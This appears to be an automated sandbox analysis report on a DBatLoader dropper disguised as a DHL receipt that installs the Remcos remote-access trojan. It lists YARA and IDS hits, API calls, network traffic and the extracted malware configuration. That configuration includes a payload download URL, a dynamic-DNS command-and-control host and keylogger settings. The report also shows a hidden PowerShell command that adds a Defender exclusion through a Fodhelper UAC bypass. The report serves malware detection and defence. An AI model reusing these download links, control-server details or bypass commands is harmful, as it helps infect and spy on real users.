              Source: DHL119040 receipt document,pdf.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8"]}
              Source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jantasagasa.duckdns.org:44577:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0X3XK5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for submitted file
              Source: DHL119040 receipt document,pdf.exeVirustotal: Detection: 18%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA73837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_2DA73837
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A48C8 CryptUnprotectData,connect,CreateEventW,CreateEventW,WSAGetLastError,5_2_2D5A48C8
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A6A63 LoadLibraryA,GetProcAddress,CryptUnprotectData,5_2_2D5A6A63
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B14F5 SetEvent,CryptUnprotectData,inet_ntoa,5_2_2D5B14F5
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_2D5D3837
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,20_2_00404423
              Source: DHL119040 receipt document,pdf.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA474FD _wcslen,CoGetObject,0_2_2DA474FD
              UAC bypass detected (Fodhelper)
              Source: C:\Users\Public\ger.exeRegistry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"
              Source: DHL119040 receipt document,pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49762 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
              Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028A58B4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_2DA4BD37
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4783C FindFirstFileW,FindNextFileW,0_2_2DA4783C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_2DA4880C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_2DA4BB30
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_2DA59AF5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_2DA49665
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_2DA4C34D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_2DA5C291
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_2DA49253
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_45BC10F1
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_2D5AC34D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_2D5ABD37
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_2D5A9665
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose,5_2_2D5A880C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A783C FindFirstFileW,FindNextFileW,5_2_2D5A783C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_2D5ABB30
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B9AF5 FindFirstFileW,5_2_2D5B9AF5
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_2D5BC291
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,7_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,7_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,7_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF7689D7B4C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF7689D7B4C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7689D7B4C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_2DA47C97
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Temp\971D.tmpJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmpJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmpJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\Jump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49736 -> 23.227.203.18:44577
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 23.227.203.18:44577 -> 192.168.2.4:49736
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8
              Source: Malware configuration extractorURLs: jantasagasa.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: jantasagasa.duckdns.org
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BD028 InternetCheckConnectionA,0_2_028BD028
              Source: global trafficTCP traffic: 192.168.2.4:49736 -> 23.227.203.18:44577
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 13.107.43.12 13.107.43.12
              Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sxjVaZT4pY1q2eD0v-X1wiwRbDuGgZo1tPSkJQs1YlyPwcUOiphPP1CFv5fso0icEDo7UAOw11RMGNT3gKAlqFYfTYnpmUh-zszDDp01M-O6V1fxPW_BQeV--ErDLGsxS3W7ik99EAoJzOkWYmsVxFxg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtduMf3h_au6JknD7UX3Nl_MoVpKgD52R4PqoJUKWWdS4uSG73hTWQdvja7P44RRgZEYiLLcwYHjthc2obdA6bfKdGY5u4FdO7DnLs4oCuESa0XFsNGj4J9xIGakwI-vvnf8T5wmslL_zbb61Cor0vi4A/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4lwBmhbII6IBdf0o3fxZK7yXuPn1LU5GNfJiPoJA9A_3sVCDQ9m4bgvnVzMP5THmKtOGhfXkUIlvBLYfdv66aM2t5dQKJV9HM_tE2EpVyspDfMklEPIq63I71zYBRHlyxU6NlRs6xSUBmbwPAYp6Jhg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4SuVfoR9x-Iomuy2BGk4fUfgK1MMU5lLacLNp-_qwXhodYEIY-kbbcZJlxV0oGHQD1Ct2YWj0uKczDCYctblhO9FSOouYIL0JztXtWXSZy4aW13cnRilCw1aQM1FfakIYbRqJw9b266qfDhk_4fORrQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
